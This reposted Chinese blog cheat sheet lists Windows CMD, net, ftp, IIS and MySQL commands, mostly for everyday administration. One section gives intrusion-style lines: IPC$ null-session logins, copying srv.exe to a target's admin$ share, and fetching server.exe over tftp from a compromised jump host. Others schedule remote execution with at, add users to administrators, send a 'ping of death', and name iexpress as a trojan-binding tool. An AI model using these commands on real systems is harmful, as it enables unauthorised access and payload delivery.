轉自:https://www.cnblogs.com/cainiao-chuanqi/p/11041924.html
MS-Dos
cmd命令是command的縮寫,即命令提示符(CMD),是在OS/2,Windows CE 與Windows NT平台為基礎的操作系統(包括Windows 2000和XP中,Vista中和Server 2003)下的“MS-DOS方式”。中文版Windows XP中的命令提示符進一步提高了與DOS下操作命令的兼容性,用戶可以在命令提示符直接輸入中文調用文件。在9x系統下輸入command就可以打開命令行,在NT系統上可以輸入cmd打開,在Windows2000后被cmd替代,利用CMD命令查詢系統的信息或是判斷網絡的好壞。
運行操作
CMD命令:開始 -> 運行 ->鍵入cmd 或 command (在命令行可以看到系統版本、文件系統版本)
常用命令
- 啟動: Win+R,輸入cmd回車
- 切換盤符 盤符名稱:
- 進入文件夾 cd 文件夾名稱
- 進入多級文件夾 cd 文件夾1/文件夾2/文件夾3
- 返回上一級 cd ..
- 直接回跟路徑 cd /
- 查看當前內容 dir
- 清屏 cls
- 退出 exit
- 查看系統賬戶:net user:使用命令“net user”命令查看系統賬戶
- 查看用戶管理:lusrmgr.msc:查看用戶管理
- 查看所有進程:在命令行中執行netstat –ano查看所有進程
- 查找對應的服務名稱:進程號是2500,使用tasklist | findstr 2500查找對應的服務名稱
- 查看到進程的詳細信息:開始--運行--輸入msinfo32,依次點擊“軟件環境→正在運行任務”就可以查看到進程的詳細信息,比如進程路徑、進程ID、文件創建日期、啟動時間等。
- 看程序名對應的路徑:使用wmic查看程序名對應的路徑
- 查看端口對應的PID: netstat -ano | findstr “port”
- 查看進程對應的PID:任務管理器--查看--選擇列--PID 或者 tasklist | findstr “PID”
- 查看進程對應的程序位置:任務管理器--選擇對應進程--右鍵打開文件位置,運行輸入 wmic,cmd界面 輸入 process tasklist /svc 進程--PID--服務
- 查看是否存在命名異常的啟動項目:單擊開始菜單 >【運行】,輸入 msconfig,查看是否存在命名異常的啟動項目,是則取消勾選命名異常的啟動項目,並到命令中顯示的路徑刪除文件。
- 查看組策略:運行gpedit.msc。
- 查看計算機與網絡上的其它計算機之間的會話或計划任務:單擊【開始】>【運行】;輸入 cmd,然后輸入at,檢查計算機與網絡上的其它計算機之間的會話或計划任務,如有,則確認是否為正常連接。
- 查看是否有異常服務:單擊【開始】>【運行】,輸入services.msc,注意服務狀態和啟動類型,檢查是否有異常服務。
- 查看系統信息:單擊【開始】>【運行】,輸入systeminfo,查看系統信息
- 打開“事件查看器:Win+R打開運行,輸入“eventvwr.msc”,回車運行,打開“事件查看器”。
- calc-----------啟動計算器
- certmgr.msc----證書管理實用程序
- charmap--------啟動字符映射表
- chkdsk.exe-----Chkdsk磁盤檢查
- ciadv.msc------索引服務程序
- cleanmgr-------垃圾整理
- cliconfg-------SQLSERVER客戶端網絡實用程序
- Clipbrd--------剪貼板查看器
- cmd.exe--------CMD命令提示符
- compmgmt.msc---計算機管理
- conf-----------啟動netmeeting
- dcomcnfg-------打開系統組件服務
- ddeshare-------打開DDE共享設置
- devmgmt.msc---設備管理器
- dfrg.msc-------磁盤碎片整理程序
- diskmgmt.msc---磁盤管理實用程序
- drwtsn32------系統醫生
- dvdplay--------DVD播放器
- dxdiag---------檢查DirectX信息
- explorer-------打開資源管理器
- eudcedit-------造字程序
- eventvwr-------事件查看器
- fsmgmt.msc-----共享文件夾管理器
- gpedit.msc-----組策略
- iexpress-------木馬捆綁工具,系統自帶
- logoff---------注銷命令
- lusrmgr.msc----本機用戶和組
- notepad--------打開記事本
- magnify--------放大鏡實用程序
- mem.exe--------顯示內存使用情況
- mmc------------打開控制台49.
- mobsync--------同步命令
- mplayer2-------簡易widnowsmediaplayer
- Msconfig.exe---系統配置實用程序
- mspaint--------畫圖板
- mstsc----------遠程桌面連接
- narrator-------屏幕“講述人”
- netstartmessenger----開始信使服務
- netstat-an----(TC)命令檢查接口
- netstopmessenger-----停止信使服務
- Nslookup-------IP地址偵測器,是一個監測網絡中DNS服務器是否能正確實現域名解析的命令行工具.
- 它在WindowsNT/2000/XP中均可使用,但在Windows98中卻沒有集成這一個工具。
- ntbackup-------系統備份和還原
- ntmsmgr.msc----移動存儲管理器
- ntmsoprq.msc---移動存儲管理員操作請求
- odbcad32-------ODBC數據源管理器
- oobe/msoobe/a----檢查XP是否激活
- osk------------打開屏幕鍵盤
- packager-------對象包裝程序
- perfmon.msc----計算機性能監測程序
- progman--------程序管理器
- regedit.exe----注冊表
- regedt32-------注冊表編輯器
- regsvr32/u*.dll----停止dll文件運行
- regsvr32/uzipfldr.dll------取消ZIP支持
- rononce-p----15秒關機
- rsop.msc-------組策略結果集
- secpol.msc-----本地安全策略
- services.msc---本地服務設置
- sfc.exe--------系統文件檢查器
- sfc/scannow-----掃描錯誤並復原
- sfc/scannow---windows文件保護
- shrpubw--------創建共享文件夾
- shutdown-------60秒倒計時關機命令【shutdown /參數 關閉或重啟本地或遠程主機。參數說明:/S 關閉主機,/R 重啟主機, /T 數字 設定延時的時間,范圍0~180秒之間, /A取消開機,/M //IP 指定的遠程主機。例:shutdown /r /t 0 立即重啟本地主機(無延時)】
- sigverif-------文件簽名驗證程序
- sndrec32-------錄音機
- Sndvol32-------音量控制程序
- syncapp--------創建一個公文包
- sysedit--------系統配置編輯器
- syskey---------系統加密,一旦加密就不能解開,保護windowsxp系統的雙重密碼
- taskmgr--------任務管理器
- tourstart------xp簡介(安裝完成后出現的漫游xp程序)
- utilman--------輔助工具管理器
- wiaacmgr-------掃描儀和照相機向導
- winchat--------XP自帶局域網聊天
- winmsd---------系統信息
- winver---------檢查Windows版本
- write----------寫字板
- wmimgmt.msc----打開windows管理體系結構(WMI)
- wscript--------windows腳本宿主設置
- wupdmgr--------windows更新程序
- taskkill /參數 進程名或進程的pid 終止一個或多個任務和進程。(參數說明:/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進程。)
- tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。(參數說明:/M 列出當前進程加載的dll文件,/SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程。)
===============<<< 操作詳情 >>>==================
- net use ipipc$ " " /user:" " 建立IPC空鏈接
- net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
- net use h: ipc$ "密碼" /user:"用戶名" 直接登陸后映射對方C:到本地為H:
- net use h: ipc$ 登陸后映射對方C:到本地為H:
- net use ipipc$ /del 刪除IPC鏈接
- net use h: /del 刪除映射對方到本地的為H:的映射
- net user 用戶名 密碼 /add 建立用戶
- net user guest /active:yes 激活guest用戶
- net user 查看有哪些用戶
- net user 帳戶名 查看帳戶的屬性
- net localgroup administrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權限
- net start 查看開啟了哪些服務
- net start 服務名 開啟服務;(如:net start telnet, net start schedule)
- net stop 服務名 停止某服務
- net time 目標ip 查看對方時間
- net time 目標ip /set 設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息
- net view 查看本地局域網內開啟了哪些共享
- net view ip 查看對方局域網內開啟了哪些共享
- net config 顯示系統網絡設置
- net logoff 斷開連接的共享
- net pause 服務名 暫停某服務
- net send ip "文本信息" 向對方發信息
- net ver 局域網內正在使用的網絡連接類型和信息
- net share 查看本地開啟的共享
- net share ipc開啟ipc共享
- net share ipc/del刪除ipc共享
- net share c$ /del 刪除C:共享
- net user guest 12345 用guest用戶登陸后用將密碼改為12345
- net password 密碼 更改系統登陸密碼
- netstat -a 查看開啟了哪些端口,常用netstat -an
- netstat -n 查看端口的網絡連接情況,常用netstat -an
- netstat -v 查看正在進行的工作
- netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況
- netstat -s 查看正在使用的所有協議使用情況
- nbtstat -A ip 對方136到139其中一個端口開了的話,就可查看對方最近登陸的用戶名
- tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:“-w數字”用於設置超時間隔。
- ping ip(或域名) 向對方主機發送默認大小為32字節的數據,參數:“-l[空格]數據包大小”;“-n發送數據次數”;“-t”指一直ping。
- ping -t -l 65500 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
- ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“/all”顯示全部配置信息
- tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
- kill -F 進程名 加-F參數后強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
- del -F 文件名 加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件,“DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件
- del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
- move 盤符路徑要移動的文件名 存放移動文件的路徑移動后文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
- fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令
- at id號 開啟已注冊的某個計划任務
- at /delete 停止所有計划任務,用參數/yes則不需要確認就直接停止
- at id號 /delete 停止某個已注冊的計划任務
- at 查看所有的計划任務
- at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
- finger username @host 查看最近有哪些用戶登陸
- telnet ip 端口 遠程登陸服務器,默認端口為23
- open ip 連接到IP(屬telnet登陸后的命令)
- telnet 在本機上直接鍵入telnet 將進入本機的telnet
- copy 路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
- copy c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
- copy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
- copy ipadminsvv.exec:或:copyipadmin*.* 復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
- xcopy 要復制的文件或目錄樹 目標地址目錄名 復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件,用參數/e才可連目錄下的子目錄一起復制到目標地址下。
- tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exec:server.exe 登陸后,將“IP”的server.exe下載到目標主機c:server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
- tftp -i 對方IP put c:server.exe 登陸后,上傳本地c:server.exe至主機
- ftp ip 端口 用於上傳文件至服務器或進行文件操作,默認端口為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
- route print 顯示出IP路由,將主要顯示網絡地址Network addres,子網掩碼Netmask,網關地址Gateway addres,接口地址Interface
- arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
- start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
- mem 查看cpu使用情況
- attrib 文件名(目錄名) 查看某文件(目錄)的屬性
- attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
- dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
- date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間,而不必輸入新日期和時間
- set 指定環境變量名稱=要指派給變量的字符 設置環境變量
- set 顯示當前所有的環境變量
- set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環境變量
- pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
- if 在批處理程序中執行條件處理(更多說明見if命令及變量)
- goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:“:start”標簽)
- call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call /?)
- for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變量)
- echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
- echo 信息 在屏幕上顯示出信息
- echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
- findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hello
- find 文件名 查找某文件
- title 標題名字 更改CMD窗口標題名字
- color 顏色值 設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
- prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為:EntSky )
- ver 在DOS窗口下顯示版本信息
- winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)
- format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS,例:Format D: /FS:NTFS
- md 目錄名 創建目錄
- replace 源文件 要替換文件的目錄 替換文件
- ren 原文件名 新文件名 重命名文件名
- tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
- type 文件名 顯示文本文件的內容
- more 文件名 逐屏顯示輸出文件
- doskey 要鎖定的命令=字符
- doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=
- taskmgr 調出任務管理器
- chkdsk /F D: 檢查磁盤D並顯示狀態報告;加參數/f並修復磁盤上的錯誤
- tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認端口23為其它任何端口
- exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe
- path 路徑可執行文件的文件名 為可執行文件設置一個路徑。
- cmd 啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /?
- regedit /s 注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示;
- regedit /e 注冊表文件名 導出注冊表
- cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問權限;/G 用戶名:perm 賦予指定用戶訪問權限;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
- cacls 文件名 查看文件的訪問用戶權限列表
- REM 文本內容 在批處理文件中添加注解
- netsh 查看或更改本地網絡配置情況
===============<<< ISS服務命令 >>>==================
- iisreset /reboot 重啟win2k計算機(但有提示系統將重啟信息出現)
- iisreset /start或stop 啟動(停止)所有Internet服務
- iisreset /restart 停止然后重新啟動所有Internet服務
- iisreset /status 顯示所有Internet服務狀態
- iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動
- iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機
- iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務
- iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。
===============<<< FTP命令 >>>==================
- ftp -v -d -i -n -g[主機名] -v 顯示遠程服務器的所有響應信息。
- -d 使用調試方式。
- -n 限制ftp的自動登錄,即不使用.netrc文件。
- -g 取消全局文件名。
- help [命令] 或 ?[命令] 查看命令說明
- bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
- pwd 列出當前遠端主機目錄
- put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
- get 或 recv [遠程主機文件名] [下載到本地后的文件名] 從遠端主機中傳送至本地主機中
- mget [remote-files] 從遠端主機接收一批文件至本地主機
- mput local-files 將本地主機中一批文件傳送至遠端主機
- dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
- ascii 設定以ASCII方式傳送文件(缺省值)
- bin 或 image 設定以二進制方式傳送文件
- bell 每完成一次文件傳送,報警提示
- cdup 返回上一級目錄
- close 中斷與遠程服務器的ftp會話(與open對應)
- open host[port] 建立指定ftp服務器連接,可指定連接端口
- delete 刪除遠端主機中的文件
- mdelete [remote-files] 刪除一批文件
- mkdir directory-name 在遠端主機中建立目錄
- rename [from] [to] 改變遠端主機中的文件名
- rmdir directory-name 刪除遠端主機中的目錄
- status 顯示當前FTP的狀態
- system 顯示遠端主機系統類型
- user user-name [password] [account] 重新以別的用戶名登錄遠端主機
- open host [port] 重新建立一個新的連接
- prompt 交互提示模式
- macdef 定義宏命令
- lcd 改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄
- chmod 改變遠端主機的文件權限
- case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
- cd remote-dir 進入遠程主機目錄
- cdup 進入遠程主機目錄的父目錄
- ! 在本地機中執行交互shell,exit回到ftp環境,如!ls*.zip
===============<<< MYSQL命令 >>>==================
- mysql -h主機地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。
- (例:mysql -h110.110.110.110 -Uroot -P123456
- 注:u與root可以不用加空格,其它也一樣)
- exit 退出MYSQL
- mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
- grant select on 數據庫.* to 用戶名@登錄主機 identified by "密碼"; 增加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以后面都帶一個分號作為命令結束符)
- show databases; 顯示數據庫列表。剛開始時才兩個數據庫:mysql和test。mysql庫很重要它里面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作。
- use mysql;
- show tables; 顯示庫中的數據表
- describe 表名; 顯示數據表的結構
- create database 庫名; 建庫
- use 庫名;
- create table 表名 (字段設定列表); 建表
- drop database 庫名;
- drop table 表名; 刪庫和刪表
- delete from 表名; 將表中記錄清空
- select * from 表名; 顯示表中的記錄
- mysqldump --opt school>school.bbb 備份數據庫:(命令在DOS的mysqlin目錄下執行);注釋:將數據庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取,打開看看你會有新發現。